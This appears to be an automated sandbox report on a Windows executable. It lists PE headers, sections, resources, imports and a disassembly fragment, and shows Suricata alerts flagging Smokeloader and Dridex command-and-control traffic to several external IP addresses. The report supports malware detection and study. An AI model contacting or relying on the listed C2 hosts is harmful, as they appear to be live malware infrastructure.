mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[C++] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c608	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4f000	0x1ef88	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3c658	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3bcc0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x1c8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc8ed	0xca00	448568e573790193111d5836ce2e88db	False	0.6057394801980198	data	6.70667131185134	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x2f06c	0x2f200	692e1764b69344706a562cb9ecfe0d80	False	0.9449912964190982	data	7.893960962427734	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x10a28	0x5e00	237f27a21769cff03c9471609aef50c0	False	0.0848154920212766	data	1.0939664917011824	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4f000	0x1ef88	0x1f000	677e6b1aaeff42ab64376d95443181b6	False	0.4263797883064516	data	5.066359201072415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x68b38	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x68c68	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0x68d40	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x69be8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x6a490	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0x6aa28	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x6b8d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x6c178	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x4fa80	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.43256929637526653
RT_ICON	0x4fa80	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.43256929637526653
RT_ICON	0x50928	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5555054151624549
RT_ICON	0x50928	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5555054151624549
RT_ICON	0x511d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.586405529953917
RT_ICON	0x511d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.586405529953917
RT_ICON	0x51898	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.6098265895953757
RT_ICON	0x51898	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.6098265895953757
RT_ICON	0x51e00	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.4473029045643154
RT_ICON	0x51e00	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.4473029045643154
RT_ICON	0x543a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4941369606003752
RT_ICON	0x543a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4941369606003752
RT_ICON	0x55450	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.5212765957446809
RT_ICON	0x55450	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.5212765957446809
RT_ICON	0x55920	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3805970149253731
RT_ICON	0x55920	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3805970149253731
RT_ICON	0x567c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5090252707581228
RT_ICON	0x567c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5090252707581228
RT_ICON	0x57070	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5702764976958525
RT_ICON	0x57070	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5702764976958525
RT_ICON	0x57738	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.5845375722543352
RT_ICON	0x57738	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.5845375722543352
RT_ICON	0x57ca0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.3744813278008299
RT_ICON	0x57ca0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.3744813278008299
RT_ICON	0x5a248	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4129924953095685
RT_ICON	0x5a248	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4129924953095685
RT_ICON	0x5b2f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.4077868852459016
RT_ICON	0x5b2f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.4077868852459016
RT_ICON	0x5bc78	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.47429078014184395
RT_ICON	0x5bc78	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.47429078014184395
RT_ICON	0x5c158	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.4936034115138593
RT_ICON	0x5c158	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.4936034115138593
RT_ICON	0x5d000	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.46705776173285196
RT_ICON	0x5d000	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.46705776173285196
RT_ICON	0x5d8a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.4342485549132948
RT_ICON	0x5d8a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.4342485549132948
RT_ICON	0x5de10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.27852697095435686
RT_ICON	0x5de10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.27852697095435686
RT_ICON	0x603b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.2861163227016886
RT_ICON	0x603b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.2861163227016886
RT_ICON	0x61460	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.3081967213114754
RT_ICON	0x61460	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.3081967213114754
RT_ICON	0x61de8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.3333333333333333
RT_ICON	0x61de8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.3333333333333333
RT_ICON	0x622b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.3763326226012793
RT_ICON	0x622b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.3763326226012793
RT_ICON	0x63160	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5243682310469314
RT_ICON	0x63160	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5243682310469314
RT_ICON	0x63a08	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.6082949308755761
RT_ICON	0x63a08	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.6082949308755761
RT_ICON	0x640d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6676300578034682
RT_ICON	0x640d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6676300578034682
RT_ICON	0x64638	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	India	0.49263485477178426
RT_ICON	0x64638	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	Sri Lanka	0.49263485477178426
RT_ICON	0x66be0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	India	0.5119606003752345
RT_ICON	0x66be0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	Sri Lanka	0.5119606003752345
RT_ICON	0x67c88	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	India	0.49221311475409835
RT_ICON	0x67c88	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	Sri Lanka	0.49221311475409835
RT_ICON	0x68610	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	India	0.5460992907801419
RT_ICON	0x68610	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	Sri Lanka	0.5460992907801419
RT_STRING	0x6c970	0x35e	data	Tamil	India	0.46867749419953597
RT_STRING	0x6c970	0x35e	data	Tamil	Sri Lanka	0.46867749419953597
RT_STRING	0x6ccd0	0x5e8	data	Tamil	India	0.4398148148148148
RT_STRING	0x6ccd0	0x5e8	data	Tamil	Sri Lanka	0.4398148148148148
RT_STRING	0x6d2b8	0x27e	data	Tamil	India	0.48119122257053293
RT_STRING	0x6d2b8	0x27e	data	Tamil	Sri Lanka	0.48119122257053293
RT_STRING	0x6d538	0x6ee	data	Tamil	India	0.4295377677564825
RT_STRING	0x6d538	0x6ee	data	Tamil	Sri Lanka	0.4295377677564825
RT_STRING	0x6dc28	0x35e	data	Tamil	India	0.4605568445475638
RT_STRING	0x6dc28	0x35e	data	Tamil	Sri Lanka	0.4605568445475638
RT_ACCELERATOR	0x68af0	0x48	data	Tamil	India	0.8472222222222222
RT_ACCELERATOR	0x68af0	0x48	data	Tamil	Sri Lanka	0.8472222222222222
RT_GROUP_CURSOR	0x68d18	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x6a9f8	0x30	data			0.9375
RT_GROUP_CURSOR	0x6c6e0	0x30	data			0.9375
RT_GROUP_ICON	0x558b8	0x68	data	Tamil	India	0.6826923076923077
RT_GROUP_ICON	0x558b8	0x68	data	Tamil	Sri Lanka	0.6826923076923077
RT_GROUP_ICON	0x5c0e0	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x5c0e0	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_GROUP_ICON	0x68a78	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x68a78	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_GROUP_ICON	0x62250	0x68	data	Tamil	India	0.7115384615384616
RT_GROUP_ICON	0x62250	0x68	data	Tamil	Sri Lanka	0.7115384615384616
RT_VERSION	0x6c710	0x25c	data			0.5413907284768212

Imports

DLL	Import
KERNEL32.dll	InterlockedIncrement, InterlockedDecrement, SetEnvironmentVariableW, CreateJobObjectW, InterlockedCompareExchange, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, CreateHardLinkA, _lcreat, GetTickCount, LocalFlags, SetFileTime, ClearCommBreak, TlsSetValue, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesW, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, RaiseException, GetShortPathNameA, LCMapStringA, VerifyVersionInfoW, GetConsoleAliasExesA, GetLogicalDriveStringsA, GetLastError, GetProcAddress, CreateNamedPipeA, EnumSystemCodePagesW, SetComputerNameA, GlobalFree, LoadLibraryA, LocalAlloc, SetCalendarInfoW, GetNumberFormatW, CreateEventW, OpenEventA, QueryDosDeviceW, FoldStringW, GlobalWire, GetCurrentDirectoryA, EnumDateFormatsW, GetShortPathNameW, SetProcessShutdownParameters, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, SetFileAttributesW, CommConfigDialogW, GetLocaleInfoA, SetFilePointer, GetStdHandle, EnumCalendarInfoA, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RtlUnwind, HeapAlloc, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, HeapSize, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW
GDI32.dll	CreateDCW, GetCharWidth32A, GetCharWidthI
WINHTTP.dll	WinHttpOpen

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T23:27:26.351046+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49755	190.224.203.37	80	TCP
2024-10-03T23:27:27.758377+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49765	190.224.203.37	80	TCP
2024-10-03T23:27:29.194284+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49776	190.224.203.37	80	TCP
2024-10-03T23:27:30.544106+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49787	190.224.203.37	80	TCP
2024-10-03T23:27:31.904800+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49798	190.224.203.37	80	TCP
2024-10-03T23:27:33.286503+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49807	190.224.203.37	80	TCP
2024-10-03T23:27:34.676196+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49815	190.224.203.37	80	TCP
2024-10-03T23:27:36.198420+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49826	190.224.203.37	80	TCP
2024-10-03T23:27:37.768833+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49836	190.224.203.37	80	TCP
2024-10-03T23:27:39.169274+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49847	190.224.203.37	80	TCP
2024-10-03T23:27:40.555439+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49857	190.224.203.37	80	TCP
2024-10-03T23:27:42.030471+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49866	190.224.203.37	80	TCP
2024-10-03T23:27:43.407680+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49875	190.224.203.37	80	TCP
2024-10-03T23:27:44.841740+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49886	190.224.203.37	80	TCP
2024-10-03T23:27:46.506715+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49896	190.224.203.37	80	TCP
2024-10-03T23:27:47.946560+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49905	190.224.203.37	80	TCP
2024-10-03T23:27:49.341855+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49915	190.224.203.37	80	TCP
2024-10-03T23:27:50.755886+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49925	190.224.203.37	80	TCP
2024-10-03T23:27:52.931239+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49933	190.224.203.37	80	TCP
2024-10-03T23:27:54.628396+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49943	190.224.203.37	80	TCP
2024-10-03T23:27:56.024081+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49955	190.224.203.37	80	TCP
2024-10-03T23:27:57.416962+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49962	190.224.203.37	80	TCP
2024-10-03T23:27:58.838657+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49973	190.224.203.37	80	TCP
2024-10-03T23:28:00.557599+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49983	190.224.203.37	80	TCP
2024-10-03T23:28:01.964076+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	49995	190.224.203.37	80	TCP
2024-10-03T23:28:04.724708+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50001	190.224.203.37	80	TCP
2024-10-03T23:28:06.106668+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50002	190.224.203.37	80	TCP
2024-10-03T23:28:07.783475+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50003	190.224.203.37	80	TCP
2024-10-03T23:28:27.492822+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50004	23.145.40.162	443	TCP
2024-10-03T23:28:27.815568+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50004	23.145.40.162	443	TCP
2024-10-03T23:28:27.911603+0200	2829848	ETPRO MALWARE SmokeLoader encrypted module (3)	2	23.145.40.162	443	192.168.2.5	50004	TCP
2024-10-03T23:28:28.827338+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50005	23.145.40.162	443	TCP
2024-10-03T23:28:29.109018+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50005	23.145.40.162	443	TCP
2024-10-03T23:28:29.698649+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50006	23.145.40.162	443	TCP
2024-10-03T23:28:29.972457+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50006	23.145.40.162	443	TCP
2024-10-03T23:28:30.593972+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50007	23.145.40.162	443	TCP
2024-10-03T23:28:30.878819+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50007	23.145.40.162	443	TCP
2024-10-03T23:28:31.491717+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50008	23.145.40.162	443	TCP
2024-10-03T23:28:31.769891+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50008	23.145.40.162	443	TCP
2024-10-03T23:28:32.397820+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50009	23.145.40.162	443	TCP
2024-10-03T23:28:32.676674+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50009	23.145.40.162	443	TCP
2024-10-03T23:28:33.281763+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50010	23.145.40.162	443	TCP
2024-10-03T23:28:33.562551+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50010	23.145.40.162	443	TCP
2024-10-03T23:28:34.158137+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50011	23.145.40.162	443	TCP
2024-10-03T23:28:34.427119+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50011	23.145.40.162	443	TCP
2024-10-03T23:28:35.523365+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50012	23.145.40.162	443	TCP
2024-10-03T23:28:35.807317+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50012	23.145.40.162	443	TCP
2024-10-03T23:28:36.427500+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50013	23.145.40.162	443	TCP
2024-10-03T23:28:36.718130+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50013	23.145.40.162	443	TCP
2024-10-03T23:28:37.346496+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50014	23.145.40.162	443	TCP
2024-10-03T23:28:37.626997+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50014	23.145.40.162	443	TCP
2024-10-03T23:28:38.252554+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50015	23.145.40.162	443	TCP
2024-10-03T23:28:38.530680+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50015	23.145.40.162	443	TCP
2024-10-03T23:28:39.245617+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50016	23.145.40.162	443	TCP
2024-10-03T23:28:39.534129+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50016	23.145.40.162	443	TCP
2024-10-03T23:28:40.510134+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50017	23.145.40.162	443	TCP
2024-10-03T23:28:40.782266+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50017	23.145.40.162	443	TCP
2024-10-03T23:28:41.706436+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50018	23.145.40.162	443	TCP
2024-10-03T23:28:41.984717+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50018	23.145.40.162	443	TCP
2024-10-03T23:28:42.669103+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50019	23.145.40.162	443	TCP
2024-10-03T23:28:42.951800+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50019	23.145.40.162	443	TCP
2024-10-03T23:28:43.577729+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50020	23.145.40.162	443	TCP
2024-10-03T23:28:43.941251+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50020	23.145.40.162	443	TCP
2024-10-03T23:28:49.975552+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50021	23.145.40.162	443	TCP
2024-10-03T23:28:50.255577+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50021	23.145.40.162	443	TCP
2024-10-03T23:29:17.365927+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50022	190.224.203.37	80	TCP
2024-10-03T23:29:23.862679+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50023	190.224.203.37	80	TCP
2024-10-03T23:29:32.216730+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50024	190.224.203.37	80	TCP
2024-10-03T23:29:43.489724+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50025	190.224.203.37	80	TCP
2024-10-03T23:29:54.425367+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50026	190.224.203.37	80	TCP
2024-10-03T23:30:05.329427+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50027	23.145.40.162	443	TCP
2024-10-03T23:30:05.677019+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50027	23.145.40.162	443	TCP
2024-10-03T23:30:12.051514+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50028	187.131.253.169	80	TCP
2024-10-03T23:30:24.977476+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50029	23.145.40.162	443	TCP
2024-10-03T23:30:25.257975+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50029	23.145.40.162	443	TCP
2024-10-03T23:30:33.007547+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50030	187.131.253.169	80	TCP
2024-10-03T23:30:36.790275+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50031	23.145.40.162	443	TCP
2024-10-03T23:30:37.074358+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50031	23.145.40.162	443	TCP
2024-10-03T23:30:45.768674+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50032	187.131.253.169	80	TCP
2024-10-03T23:30:55.983251+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.5	50033	23.145.40.162	443	TCP
2024-10-03T23:30:56.286836+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.5	50033	23.145.40.162	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 23:27:24.945759058 CEST	49755	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:24.952130079 CEST	80	49755	190.224.203.37	192.168.2.5
Oct 3, 2024 23:27:24.956332922 CEST	49755	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:24.957062960 CEST	49755	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:24.957086086 CEST	49755	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:24.963490009 CEST	80	49755	190.224.203.37	192.168.2.5
Oct 3, 2024 23:27:24.963517904 CEST	80	49755	190.224.203.37	192.168.2.5
Oct 3, 2024 23:27:26.349044085 CEST	80	49755	190.224.203.37	192.168.2.5
Oct 3, 2024 23:27:26.350961924 CEST	80	49755	190.224.203.37	192.168.2.5
Oct 3, 2024 23:27:26.351046085 CEST	49755	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:26.362123013 CEST	49755	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:26.365582943 CEST	49765	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:26.366832972 CEST	80	49755	190.224.203.37	192.168.2.5
Oct 3, 2024 23:27:26.370371103 CEST	80	49765	190.224.203.37	192.168.2.5
Oct 3, 2024 23:27:26.370439053 CEST	49765	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:26.370758057 CEST	49765	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:26.370771885 CEST	49765	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:27:26.375780106 CEST	80	49765	190.224.203.37	192.168.2.5
